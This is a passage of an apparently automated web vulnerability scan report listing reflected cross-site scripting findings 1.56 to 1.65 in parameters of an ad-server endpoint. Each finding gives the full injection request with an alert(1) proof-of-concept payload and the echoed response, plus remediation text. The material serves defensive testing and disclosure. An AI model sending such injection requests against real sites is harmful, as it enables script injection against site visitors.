<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Fri
...[SNIP]...
93%3B5-0%3B0%3B54795159%3B4307-300/250%3B38460446/38478203/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=19248781642"-alert(1)-"7b5e5f069a0&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/vr
...[SNIP]...

1.56. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [count parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e518"-alert(1)-"dd64696a94d was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=3e518"-alert(1)-"dd64696a94d&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:10:53 GMT
Expires: Mon, 22 Nov 2010 00:15:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7163

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Wed
...[SNIP]...
log/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=3e518"-alert(1)-"dd64696a94d&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/innovation/us/smarterplanet/index.shtml?url=midsized_business/solutions/informationprotection&cmp=usmmb&
...[SNIP]...

1.57. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [cpnmodule parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 770c4"-alert(1)-"c8ab4cf7ab6 was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=770c4"-alert(1)-"c8ab4cf7ab6&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:10:42 GMT
Expires: Mon, 22 Nov 2010 00:15:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7028

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu
...[SNIP]...
.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=770c4"-alert(1)-"c8ab4cf7ab6&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/systems/smarter/questions/information-analytics.html?cmp=blank&cm=b&csr=agus_itquest-20100521&cr=
...[SNIP]...

1.58. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [e parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfb33"-alert(1)-"b08b2fbdfeb was submitted in the e parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=cfb33"-alert(1)-"b08b2fbdfeb&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:09:13 GMT
Expires: Mon, 22 Nov 2010 00:14:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6715

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Fri
...[SNIP]...
B0%3B54795159%3B4307-300/250%3B38460446/38478203/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=cfb33"-alert(1)-"b08b2fbdfeb&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/vrm/pref/263
...[SNIP]...

1.59. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [epartner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24bbb"-alert(1)-"7c6d580aa85 was submitted in the epartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=24bbb"-alert(1)-"7c6d580aa85&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:10:03 GMT
Expires: Mon, 22 Nov 2010 00:15:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7119

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon
...[SNIP]...
Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=24bbb"-alert(1)-"7c6d580aa85&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/systems/smarter/questions/security-resiliency.html?cmp=blank&cm=b&csr=
...[SNIP]...

1.60. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [event parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 290b3"-alert(1)-"70e6e14f3b9 was submitted in the event parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=290b3"-alert(1)-"70e6e14f3b9 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7025
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 22 Nov 2010 00:11:35 GMT
Expires: Mon, 22 Nov 2010 00:16:35 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu
...[SNIP]...
nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=290b3"-alert(1)-"70e6e14f3b9http://www.ibm.com/systems/smarter/questions/process-transformation.html?cmp=blank&cm=b&csr=agus_itquest-20100521&cr=zdnet&ct=108AU0QW&cn=telecom");
var fscUrl = url;
var fscUrlClickTagFound = false;
v
...[SNIP]...

1.61. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3cbfb"-alert(1)-"835e9647437 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn3cbfb"-alert(1)-"835e9647437&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:04:36 GMT
Expires: Mon, 22 Nov 2010 00:09:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7119

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu
...[SNIP]...
ick.net/click%3Bh%3Dv8/3a5a/17/14a/%2a/t%3B231155693%3B2-0%3B0%3B54795159%3B4307-300/250%3B37853710/37871528/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn3cbfb"-alert(1)-"835e9647437&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=
...[SNIP]...

1.62. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ddc4f"-alert(1)-"72623d3e15c was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=ddc4f"-alert(1)-"72623d3e15c&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:05:20 GMT
Expires: Mon, 22 Nov 2010 00:10:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6715

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Fri
...[SNIP]...
ick%3Bh%3Dv8/3a5a/17/14a/%2a/z%3B231155693%3B5-0%3B0%3B54795159%3B4307-300/250%3B38460446/38478203/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=ddc4f"-alert(1)-"72623d3e15c&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21
...[SNIP]...

1.63. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [nd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7295"-alert(1)-"6e36561f977 was submitted in the nd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616d7295"-alert(1)-"6e36561f977&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:06:12 GMT
Expires: Mon, 22 Nov 2010 00:11:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7037

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu
...[SNIP]...
/%2a/s%3B231155693%3B4-0%3B0%3B54795159%3B4307-300/250%3B38011117/38028874/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616d7295"-alert(1)-"6e36561f977&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http:
...[SNIP]...

1.64. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [o parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f61d8"-alert(1)-"ec4061367c2 was submitted in the o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253Af61d8"-alert(1)-"ec4061367c2&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:04:21 GMT
Expires: Mon, 22 Nov 2010 00:09:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7037

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu
...[SNIP]...
bleclick.net/click%3Bh%3Dv8/3a5a/17/14a/%2a/s%3B231155693%3B4-0%3B0%3B54795159%3B4307-300/250%3B38011117/38028874/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253Af61d8"-alert(1)-"ec4061367c2&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAA
...[SNIP]...

1.65. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [oepartner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5ca9"-alert(1)-"ec39cdc4ef5 was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=a5ca9"-alert(1)-"ec39cdc4ef5&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:09:53 GMT
Expires: Mon, 22 Nov 2010 00:14:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7163

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Wed
...[SNIP]...
